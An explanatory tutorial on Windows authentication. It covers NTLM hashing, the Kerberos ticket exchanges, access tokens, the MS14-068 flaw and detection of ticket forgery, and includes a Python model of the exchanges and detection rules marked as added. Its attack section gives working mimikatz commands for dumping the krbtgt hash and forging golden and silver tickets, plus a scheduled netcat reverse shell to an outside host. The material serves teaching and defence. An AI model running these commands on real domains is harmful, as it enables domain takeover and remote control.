2025-04-06 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/03 Report--
This article introduces the authentication protocols of Windows. Many people have doubts about how Windows authentication works, so the editor consulted various materials and sorted out a simple, practical explanation, in the hope of answering those doubts. Please follow along.
I. NTLM Authentication
First, look at how an NTLM hash is generated:
NTLM hash: password -> hexadecimal encoding -> Unicode (UTF-16LE) conversion -> MD4 hash -> NTLM hash
For example:
admin -> hex (hexadecimal encoding) = 61646d696e
61646d696e -> Unicode = 610064006d0069006e00
610064006d0069006e00 -> MD4 = 209c6174da490caeb422f3fa5a7ae634
To protect the NTLM hash, it is never transmitted directly during authentication. There are two kinds of NTLM authentication, as follows:
NTLM local authentication: the client sends identity information such as the user name; the server generates a random 16-digit challenge and sends it to the client; the client encrypts the challenge with its NTLM hash and sends the result to the server. The server looks up the NTLM hash by user name, encrypts the challenge the same way, and compares its result with what the client sent. If they match, authentication succeeds.
NTLM network authentication: this applies when a domain account is used to log in and the server does not hold the user's hash. The difference is that the server forwards the user information, the challenge, and the client's response to the domain controller, which performs the verification and returns the result. The flow chart is shown in the following figure:
II. Kerberos Authentication
The NTLM protocol is relatively simple; Kerberos authentication is more complex, so a few concepts come first.
Kerberos authentication involves three parties: the client, the server, and the KDC (Key Distribution Center).
The KDC consists of two services, the AS (Authentication Service) and the TGS (Ticket Granting Service).
The AS issues a TGT (Ticket Granting Ticket) to the client, and the TGS issues an ST (service ticket) for a specific service to the client. The TGT is the temporary credential used to obtain an ST, and the ST is the ticket that must be presented to access a service.
Step 1: interaction between the client and the AS
Client sends: user name + (user information, timestamp, etc.) encrypted with the user's password
AS: looks up the user's password by user name, decrypts the user information and timestamp, and if verification succeeds, randomly generates a session key
AS sends: (session key) encrypted with the user's password + TGT (i.e. (user information, session key) encrypted with the krbtgt key)
Note: the only thing in the TGT that the user does not know is the krbtgt password hash, so whoever holds that hash can forge a TGT of their own, the so-called golden ticket.
Step 2: interaction between the client and the TGS
Client sends: (user information, timestamp, etc.) encrypted with the session key + name of the service to be accessed + TGT
TGS: decrypts the TGT with the krbtgt password, obtains the session key, decrypts the user information with it, and compares it with the user information inside the TGT. After successful verification it randomly generates a server session key
TGS sends: (server session key) encrypted with the session key + ST (i.e. (user information, server session key) encrypted with the corresponding server's password)
Note: the only thing in the ST that the user does not know is the server's password hash, so whoever holds that hash can forge an ST of their own, the so-called silver ticket.
Step 3: interaction between the client and the server
Client sends: (user information, timestamp, etc.) encrypted with the server session key + ST
Server: decrypts the ST with its own password to obtain the server session key, then decrypts the user information with the server session key and compares it with the user information inside the ST. If they match, authentication succeeds.
The flow chart is shown in the following figure:
In the process above, a different key is used for almost every encryption, which is a good application of the one-key-per-message principle.
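A constructed model of the three exchanges above (added here, not from the original article). seal()/unseal() stand in for Kerberos symmetric encryption with an HMAC-SHA256 tag, which provides the integrity check each verification step depends on but no secrecy; principal names, keys and timestamps are made up, and timestamps are carried but not validated.

```python
import hashlib, hmac, json, os

# Stand-in for Kerberos symmetric encryption (real KDCs use AES/RC4 etypes): a keyed tag over
# a JSON body. Opening a blob with the wrong key fails, which is what every step below relies on.
def seal(key: bytes, msg: dict) -> bytes:
    body = json.dumps(msg, sort_keys=True).encode()
    return hmac.new(key, body, hashlib.sha256).digest() + body

def unseal(key: bytes, blob: bytes) -> dict:
    tag, body = blob[:32], blob[32:]
    if not hmac.compare_digest(tag, hmac.new(key, body, hashlib.sha256).digest()):
        raise ValueError("wrong key or tampered ticket")
    return json.loads(body)

# Long-term keys (constructed): the KDC knows all of them, each principal knows only its own.
USER_KEYS = {"alice": os.urandom(16)}
KRBTGT_KEY = os.urandom(16)                       # never leaves the KDC
SERVICE_KEYS = {"cifs/fs01.test.com": os.urandom(16)}

def as_exchange(user: str, authenticator: bytes):
    """Step 1: the AS checks the pre-auth blob with the user's key, issues session key + TGT."""
    unseal(USER_KEYS[user], authenticator)
    session = os.urandom(16).hex()
    tgt = seal(KRBTGT_KEY, {"user": user, "session": session})
    return seal(USER_KEYS[user], {"session": session}), tgt

def tgs_exchange(tgt: bytes, authenticator: bytes, service: str):
    """Step 2: the TGS opens the TGT with the krbtgt key, checks the authenticator, issues ST."""
    t = unseal(KRBTGT_KEY, tgt)
    if unseal(bytes.fromhex(t["session"]), authenticator)["user"] != t["user"]:
        raise ValueError("authenticator does not match TGT")
    svc_session = os.urandom(16).hex()
    st = seal(SERVICE_KEYS[service], {"user": t["user"], "session": svc_session})
    return seal(bytes.fromhex(t["session"]), {"session": svc_session}), st

def ap_exchange(service: str, st: bytes, authenticator: bytes) -> str:
    """Step 3: the service opens the ST with its own key and checks the authenticator."""
    t = unseal(SERVICE_KEYS[service], st)
    if unseal(bytes.fromhex(t["session"]), authenticator)["user"] != t["user"]:
        raise ValueError("authenticator does not match ST")
    return t["user"]

def client_login(user: str, user_key: bytes, service: str) -> str:
    """Client side of all three steps; returns the identity the service accepted."""
    enc, tgt = as_exchange(user, seal(user_key, {"user": user, "ts": 1}))
    session = bytes.fromhex(unseal(user_key, enc)["session"])
    enc, st = tgs_exchange(tgt, seal(session, {"user": user, "ts": 2}), service)
    svc_session = bytes.fromhex(unseal(session, enc)["session"])
    return ap_exchange(service, st, seal(svc_session, {"user": user, "ts": 3}))
```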
Kerberos authentication attack methods:
The following briefly describes forging and using a golden ticket with the tool mimikatz.
1. Obtain the krbtgt NTLM hash and related information from the domain controller
lsadump::dcsync /domain:[domain name] /user:krbtgt
2. Generate the golden ticket
privilege::debug  # elevate privileges
kerberos::golden /user:administrator /domain:[domain name] /sid:[domain sid] /krbtgt:[krbtgt hash] /ptt  # generate the ticket and import it
Parameters: /user: the domain user to forge (usually the domain administrator); /domain: the domain name; /sid: the domain SID; /krbtgt: the krbtgt hash; /ptt: import the ticket into the current session.
3. Follow-up use
① Enumerate files on the domain controller's disk
net use \\AD01.test.com
dir \\AD01.test.com\c$
② Reverse shell
nc.exe -lvp 9999  # listen on the port
copy C:\Users\Administrator\Desktop\nc.exe \\AD01.test.com\c$\nc.exe  # copy netcat to the target host
schtasks /create /tn "ncshell" /tr "c:\nc.exe 1.1.1.1 9999 -e cmd.exe" /sc once /st 19:13:00 /sd 2021-04-13 /s AD01.test.com /RU test\admin  # reverse shell
③ Execute commands directly with psexec:
PsExec64.exe \\AD01.test.com cmd.exe
Using a silver ticket is basically similar:
kerberos::golden /domain:test.com /sid:[sid] /target:[computer name].test.com /rc4:[server hash] /service:cifs /user:administrator /ptt
MS14-068 principle
Here is a brief introduction to MS14-068, the well-known vulnerability among ticket attacks.
Prerequisites for exploitation:
1. The domain controller lacks the MS14-068 patch (KB3011780)
2. Control of a domain-joined computer
3. The password and SID of a domain user in this domain
Background information:
The Kerberos protocol itself carries no permission information for the client, so the server does not know what permissions the client has. Hence the PAC (Privilege Attribute Certificate), which is carried as part of the TGT.
To guarantee the legitimacy of the PAC itself, it carries two signatures keyed with the krbtgt password.
Attack process:
The client requests a TGT without a PAC and receives a TGT that contains no PAC.
The client forges a PAC, generally containing domain administrator information, and casually signs it with MD5.
The client requests an ST, sending the TGT and specifying that a PAC is included in the request (specifically in the REQ_BODY of the TGS_REQ) and that the signature method is MD5.
On receiving the request, the TGS decrypts the PAC-less TGT and then verifies the external PAC with the specified signature algorithm, i.e. MD5. After verification succeeds, it returns to the client a new TGT that contains the PAC.
In this way the client obtains a TGT carrying the permissions of the specified user.
Ticket attack detection:
1. By tool characteristics: mimikatz and kekeo are similar, and their attack parameters are very distinctive, so they can be detected from features such as "kerberos::" in process creation logs.
2. Microsoft's ATA can detect by ticket validity period: a TGT is valid for ten hours by default, whereas tickets generated by mimikatz are valid for ten years by default (controlled by the optional /endin parameter).
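The two detection ideas above as runnable rules over constructed sample telemetry (added example, not from the article): the hosts, command lines and ticket times are made up, and the 10-hour threshold is the Active Directory default the text cites.

```python
from datetime import datetime, timedelta

# Constructed sample telemetry (not real logs): process-creation command lines in the style of
# a Windows 4688 event, and the tickets of a logon session in the style of a klist listing.
PROCESS_EVENTS = [
    {"host": "WS01", "cmdline": "cmd.exe /c dir \\\\AD01.test.com\\c$"},
    {"host": "WS01", "cmdline": 'm.exe "lsadump::dcsync /domain:test.com /user:krbtgt"'},
    {"host": "WS02", "cmdline": 'k.exe "privilege::debug" "kerberos::golden /user:administrator /ptt"'},
]
TICKETS = [
    {"client": "alice@TEST.COM", "start": "2021-04-13 08:00:00", "end": "2021-04-13 18:00:00"},
    {"client": "administrator@TEST.COM", "start": "2021-04-13 19:00:00", "end": "2031-04-11 19:00:00"},
]

# module::command syntax that mimikatz and kekeo share; the text lists these features
TOOL_MARKERS = ("kerberos::", "lsadump::", "privilege::debug")
MAX_TICKET_AGE = timedelta(hours=10)   # AD default "Maximum lifetime for user ticket"


def flag_tool_invocations(events):
    """Rule 1: command lines carrying the tool's module::command syntax."""
    return [e for e in events if any(m in e["cmdline"].lower() for m in TOOL_MARKERS)]


def ticket_lifetime(ticket) -> timedelta:
    fmt = "%Y-%m-%d %H:%M:%S"
    return datetime.strptime(ticket["end"], fmt) - datetime.strptime(ticket["start"], fmt)


def flag_long_lived_tickets(tickets, max_age=MAX_TICKET_AGE):
    """Rule 2: tickets valid for longer than domain policy allows (a forged one defaults to 10 years).
    In production read max_age from the domain's Kerberos policy rather than hard-coding it."""
    return [t for t in tickets if ticket_lifetime(t) > max_age]
```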
III. Token
A token is an object that describes the security context of a process or thread. When a user logs on to the computer, an access token is generated, and the token is copied each time the user creates a process or thread. In general, when a user double-clicks to run a program, it copies the access token of "explorer.exe". When the user logs off, the system switches the primary token to an impersonation token, and the token is not cleared until the machine is rebooted.
Token contents:
Security identifier (SID) of the user account
SIDs of the groups the user belongs to
Logon SID identifying the current logon session
List of privileges held by the user or the user's groups
Owner SID
SID of the primary group
Access control list
Source of the access token
Whether the token is a primary token or an impersonation token
Optional list of restricting SIDs
Current impersonation level
Other statistics
IV. Questions and answers
1. How is the krbtgt account created on the domain controller? Does it have a default password or a random password? How is it changed?
krbtgt is generated automatically when the domain controller is created, and the system assigns it a random password. To change the password, open Active Directory Users and Computers, find the account, choose reset password, and enter the new password. The value entered does not matter, because the system automatically generates a strong password independent of what was specified.
2. When is a token used, and when is Kerberos used? What is the relationship between them?
Tokens are used locally, and Kerberos is used for network authentication. A token contains an authentication id field that is associated with the logon session, and the logon session is in turn associated with cached credentials. When you use the token to log on to other hosts, those cached credentials are used to authenticate to the other machines.
Network logon does not cache credentials. For example, after net use to a target host, no hash is found on the target host and no usable token is found through incognito, but the plaintext account password can be seen on the local host.
3. After a token of a domain controller process has been forged on the victim host, how can it be used further?
Commands can be executed directly through net use or psexec.
4. Since NTLM authentication of a domain account is completed on the domain controller, why can the NTLM hash still be obtained after logon?
If you log on via RDP, you enter the plaintext password in a process on the remote computer. The first part of the process is similar to a local logon: winlogon.exe -> receives user input -> lsass.exe. That is, the RDP target machine receives the account credentials and processes them into a hash, and then uses that hash to authenticate against the domain controller.
This concludes the study of the authentication protocols of Windows. I hope it has resolved your doubts. Combining theory with practice helps learning, so go and try it! If you want to continue learning related knowledge, please keep following the website; the editor will keep working to bring you more practical articles.